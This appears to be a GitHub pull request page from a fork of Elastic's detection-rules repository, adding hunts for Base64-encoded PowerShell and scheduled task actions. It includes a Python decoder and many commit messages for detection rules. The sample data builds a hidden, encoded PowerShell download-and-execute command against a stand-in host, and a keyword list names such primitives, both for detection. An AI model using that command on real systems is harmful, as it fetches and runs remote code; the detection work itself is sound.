forked from elastic/detection-rules
[new hunts] add base64 decode examples #6
Closed
Conversation
Samirbous commented Jun 12, 2024
- b64 encoded powershell cmd
- b64 decode scheduled task actions via registry
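A worked decode of the two artefacts the description names, as an added example that is not part of this PR or of elastic/detection-rules. It runs over constructed ECS-shaped events (the field names `process.command_line`, `registry.path` and `registry.data.bytes` are ECS; the host names, the `example.invalid` URL and the task GUID are made up), and the scheduled task Actions blob it builds uses a simplified length-prefixed UTF-16LE layout that is only an assumption about the real TaskCache value, which is why the registry branch extracts strings instead of parsing fields.

```python
"""Decode the two Base64 artefacts these hunts target:

  1. PowerShell -EncodedCommand arguments (Base64 of UTF-16LE text)
  2. Scheduled task Actions values under ...\Schedule\TaskCache\Tasks\{GUID}\Actions,
     which endpoint telemetry carries Base64-encoded in registry.data.bytes

Added example, not code from the PR or from elastic/detection-rules. All events
below are constructed; the Actions blob layout is a simplified assumption.
"""
from __future__ import annotations

import base64
import binascii
import re
import struct

# -EncodedCommand and the prefixes PowerShell accepts (-e, -ec, -enc, ...) followed by Base64.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
TASK_ACTIONS = re.compile(r"(?i)\\Schedule\\TaskCache\\Tasks\\\{[0-9A-F-]+\}\\Actions$")
SUSPICIOUS_TERMS = ("iex", "invoke-expression", "downloadstring",
                    "frombase64string", "new-object", "hidden", "bypass")


def decode_encoded_command(command_line: str) -> str | None:
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    # PowerShell encodes the script as UTF-16LE, not UTF-8.
    return raw.decode("utf-16-le", errors="replace")


def extract_utf16_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Equivalent of `strings -el`: runs of printable UTF-16LE characters in a binary blob."""
    run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in run.finditer(blob)]


def indicators(text: str) -> list[str]:
    low = text.lower()
    return [t for t in SUSPICIOUS_TERMS if t in low]


def hunt(events: list[dict]) -> list[dict]:
    """Run both decodes over ECS-shaped events and return the findings."""
    findings = []
    for ev in events:
        if ev.get("event.category") == "process":
            decoded = decode_encoded_command(ev.get("process.command_line", ""))
            if decoded is not None:
                findings.append({"hunt": "encoded_powershell", "host": ev.get("host.name"),
                                 "decoded": decoded, "indicators": indicators(decoded)})
        elif ev.get("event.category") == "registry" and TASK_ACTIONS.search(ev.get("registry.path", "")):
            blob = base64.b64decode(ev.get("registry.data.bytes", ""))
            strings = extract_utf16_strings(blob)
            # A task action's arguments may themselves carry -EncodedCommand: decode a second level.
            nested = [d for s in strings if (d := decode_encoded_command(s)) is not None]
            findings.append({"hunt": "task_action_registry", "host": ev.get("host.name"),
                             "strings": strings, "nested": nested,
                             "indicators": indicators(" ".join(strings + nested))})
    return findings


# ---- constructed sample data (not real telemetry) ----
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()  # what gets passed to -enc
TASK_ARGS = "-NoP -W Hidden -Enc " + ENCODED


def _lp(s: str) -> bytes:
    """Length-prefixed UTF-16LE string (assumed, simplified Actions layout)."""
    enc = s.encode("utf-16-le")
    return struct.pack("<I", len(enc)) + enc


# version, author, exec-action marker, id, command, arguments, working dir, flags (assumed layout)
ACTIONS_BLOB = (b"\x03\x00" + _lp("Author") + b"\x66\x66" + _lp("") + _lp("powershell.exe")
                + _lp(TASK_ARGS) + _lp("C:\\Windows\\Temp") + b"\x00\x00")

SAMPLE_EVENTS = [
    {"event.category": "process", "host.name": "ws01",
     "process.command_line": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"event.category": "process", "host.name": "ws01",
     "process.command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"event.category": "registry", "host.name": "ws02",
     "registry.path": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks"
                      r"\{11111111-2222-3333-4444-555555555555}\Actions",
     "registry.data.bytes": base64.b64encode(ACTIONS_BLOB).decode()},
    {"event.category": "registry", "host.name": "ws02",
     "registry.path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "registry.data.bytes": base64.b64encode(b"C\x00:\x00\\\x00x\x00").decode()},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["hunt"], f["host"], f.get("decoded") or f["nested"], f["indicators"])
```

Two points the example makes that a hunt query has to get right as well: the `-EncodedCommand` payload is UTF-16LE, so a plain UTF-8 decode leaves interleaved NULs and defeats substring matching on terms like `DownloadString`; and the task's action arguments can themselves carry `-enc`, so the registry branch decodes a second level before looking for indicators. The string-extraction approach also tolerates length-prefix bytes that happen to be printable, which a naive byte scan would glue onto the preceding string.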
elastic#3402) * Locked versions for releases: 8.3,8.4,8.5,8.6,8.7,8.8,8.9,8.10,8.11,8.12 * Update detection_rules/etc/version.lock.json --------- Co-authored-by: terrancedejesus <[email protected]> Co-authored-by: Terrance DeJesus <[email protected]>
* [New BBR] Reverse Connection through Port Knocking * Attempt to fix unit testing error * Mitre list fix? * Revert "Mitre list fix?" This reverts commit 83682b8. * Update command_and_control_linux_port_knocking_reverse_connection.toml * Update command_and_control_linux_port_knocking_reverse_connection.toml * Update rules_building_block/command_and_control_linux_port_knocking_reverse_connection.toml * Update command_and_control_linux_port_knocking_reverse_connection.toml * Update command_and_control_linux_port_knocking_reverse_connection.toml --------- Co-authored-by: Colson Wilhoit <[email protected]>
* [New Rule] Suspicious Passwd File Event Action * Description fix * Pot. UT fix * Pot. UT fix. --------- Co-authored-by: Colson Wilhoit <[email protected]>
* Update credential_access_dcsync_newterm_subjectuser.toml * Update credential_access_dcsync_replication_rights.toml
* Update command_and_control_google_drive_malicious_file_download.toml * Update command_and_control_google_drive_malicious_file_download.toml * Update command_and_control_google_drive_malicious_file_download.toml
…ic#3401) Co-authored-by: Ruben Groenewoud <[email protected]>
…#3416) * Create discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml * Update discovery_active_directory_webservice.toml
* [Rule Tuning] Windows BBR Tuning - 1 * . --------- Co-authored-by: Samirbous <[email protected]>
* [New Rule] Network Connection via systemd * Removed space from description * Added updated query
* [New Rule] apt Package Manager Persistence * [New Rules] APT Package Manager Persistence * [New Rules] APT Package Manager Persistence
* [New Rule] Executable Masquerading as Kernel Proc * Bumped dates * Added endgame support * Added auditd_manager support * Removed auditd_manager support for now
* [New Rules] DDExec Analysis * Increased rule scope * [New Rule] Dynamic Linker Discovery via od * Revert "[New Rule] Dynamic Linker Discovery via od" This reverts commit c58595b. * [New Rule] Dynamic Linker Discovery via od * [New Rule] Potential Memory Seeking Activity * [New BBR] Suspicious Memory grep Activity * Added endgame + auditd_manager support * Removed auditd_manager support for now * Removed auditd_manager support for now * Update discovery_suspicious_memory_grep_activity.toml --------- Co-authored-by: Samirbous <[email protected]>
* release fleet workflow updates; build package integration reference changes * updated commit hash extraction to output to env * adjusted bump-pkg-versions to only include release if necessary * fixed flake errors * add historical argument for build-release set to yes by default * Update detection_rules/devtools.py * fixed fleet workflow; updated registry data references * updated job names * removed extract commit hash job and consolidated into fleet pr job * added echo statement for current branch before checkout * removed id from extract commit hash
elastic#3431) * Locked versions for releases: 8.3,8.4,8.5,8.6,8.7,8.8,8.9,8.10,8.11,8.12 * Update detection_rules/etc/version.lock.json * updated downloadable updates file to reconcile changes * Removed spacing from downloadable updates file --------- Co-authored-by: terrancedejesus <[email protected]> Co-authored-by: Terrance DeJesus <[email protected]>
…ty docs (elastic#3434) * removed historical argument; added setup string; fixed links * fixing flake errors * added types for command arguments * adjusted get_release_diff to append strings for release tags * set fetch-depth to 0 for integrations checkout in workflow * changed the name of the workflow * removed TODOs * adjusted release docs workflow to remove prefix for release tags * adjusted URL replacement only if pointed to docs site * added elastic website to regex pattern * add docstrings; adjusted regex; add note for stopgap * added a note about the regex pattern for elastic URLs
* [Rule Tuning] Windows BBR Tuning - 2 * Update defense_evasion_masquerading_windows_system32_exe.toml --------- Co-authored-by: Ruben Groenewoud <[email protected]>
* [Rule Tuning] Windows BBR Tuning - 4 * Update discovery_system_time_discovery.toml
* [Rule Tuning] Windows BBR Tuning - 3 * Update defense_evasion_service_disabled_registry.toml --------- Co-authored-by: Samirbous <[email protected]>
* Create initial_access_execution_from_inetcache.toml * Update initial_access_execution_from_inetcache.toml
…lastic#3430) * [FR] Add Auditd_Manager to NON_DATASET_PACKAGE * Changed alphabetical order --------- Co-authored-by: Mika Ayenson <[email protected]> Co-authored-by: Terrance DeJesus <[email protected]>
* [Tuning] Linux DR Tuning - Part 2 * Update defense_evasion_binary_copied_to_suspicious_directory.toml * Update defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml
* [Tuning] Linux DR Tuning - Part 1 * Update command_and_control_linux_tunneling_and_port_forwarding.toml * Update command_and_control_cat_network_activity.toml
* [New Rule] User Added to Privileged Group * add more groups * Update rules/windows/persistence_user_account_added_to_privileged_group_ad.toml Co-authored-by: Terrance DeJesus <[email protected]> * Update persistence_user_account_added_to_privileged_group_ad.toml --------- Co-authored-by: Terrance DeJesus <[email protected]>
…oup, Role(es|ql) (elastic#3735) * [New Rule] AWS IAM AdministratorAccess Policy Attached to User issue... * add source.address and source.geo.location * fix threat tactic ids * AdministratorAccess Policy Attached to Group * AdministratorAccess Policy Attached to Role * reduce severity to medium Co-authored-by: Ruben Groenewoud <[email protected]> --------- Co-authored-by: Ruben Groenewoud <[email protected]>
* [New Rule] Executable Bit Set for rc.local/rc.common * Endgame compatibility * Update rules/linux/persistence_rc_local_common_executable_bit_set.toml
* [New Rule] Netcon through XDG Autostart Entry * Update rules/linux/persistence_xdg_autostart_netcon.toml Co-authored-by: Terrance DeJesus <[email protected]> * Update persistence_xdg_autostart_netcon.toml * Update persistence_xdg_autostart_netcon.toml --------- Co-authored-by: Terrance DeJesus <[email protected]>
…c#3759) * [New Rule] Network Connection Initiated by SSH Parent Process * Update persistence_ssh_netcon.toml * Update rules/linux/persistence_ssh_netcon.toml Co-authored-by: Samirbous <[email protected]> * Update rules/linux/persistence_ssh_netcon.toml Co-authored-by: Samirbous <[email protected]> * Update persistence_ssh_netcon.toml * Update persistence_ssh_netcon.toml --------- Co-authored-by: Samirbous <[email protected]>
* new rule 'AWS S3 Bucket Object Retrieval, Deletion, and Potential Ransom Note Replacement' * fixed technique mapping * added investigation guide; added more ransom note extensions * adjusted lookback and maxspan * added API call to second sequence * updating date * Update rules/integrations/aws/impact_s3_bucket_object_deletion_and_ransomware_note_added.toml Co-authored-by: Ruben Groenewoud <[email protected]> * Update rules/integrations/aws/impact_s3_bucket_object_deletion_and_ransomware_note_added.toml Co-authored-by: Ruben Groenewoud <[email protected]> * changed rule to ESQL; updated investigation guide * changed file name * removed txt, ecc, and note --------- Co-authored-by: Ruben Groenewoud <[email protected]>
…nce_frequency_by_top_source_ip.toml
…_frequency_by_top_source_ip.md
…nce_frequency.toml
* [Rule Tuning] Systemd-udevd Rule File Creation * Incompatible endgame field * Update rules/linux/persistence_udev_rule_creation.toml * Update rules/linux/persistence_udev_rule_creation.toml Co-authored-by: Samirbous <[email protected]> * Update rules/linux/persistence_udev_rule_creation.toml Co-authored-by: Samirbous <[email protected]> * Update persistence_udev_rule_creation.toml --------- Co-authored-by: Samirbous <[email protected]>
* [New Rules] PAM Module Creation & Unusual PAM Grantor * Update persistence_unusual_pam_grantor.toml * Update persistence_pluggable_authentication_module_creation.toml * Update rules/linux/persistence_pluggable_authentication_module_creation.toml * Update persistence_pluggable_authentication_module_creation.toml * Update persistence_unusual_pam_grantor.toml * Update rules/linux/persistence_pluggable_authentication_module_creation.toml
* [New Rule] Suspicious File Modification * Update persistence_suspicious_file_modifications.toml * Update rules/linux/persistence_suspicious_file_modifications.toml Co-authored-by: Jonhnathan <[email protected]> * Update rules/linux/persistence_suspicious_file_modifications.toml Co-authored-by: Jonhnathan <[email protected]> * Updates * Update rules/integrations/fim/persistence_suspicious_file_modifications.toml --------- Co-authored-by: Jonhnathan <[email protected]> Co-authored-by: Justin Ibarra <[email protected]>
- Scheduled tasks creation by action via registry
- Suspicious Base64 Encoded PowerShell Command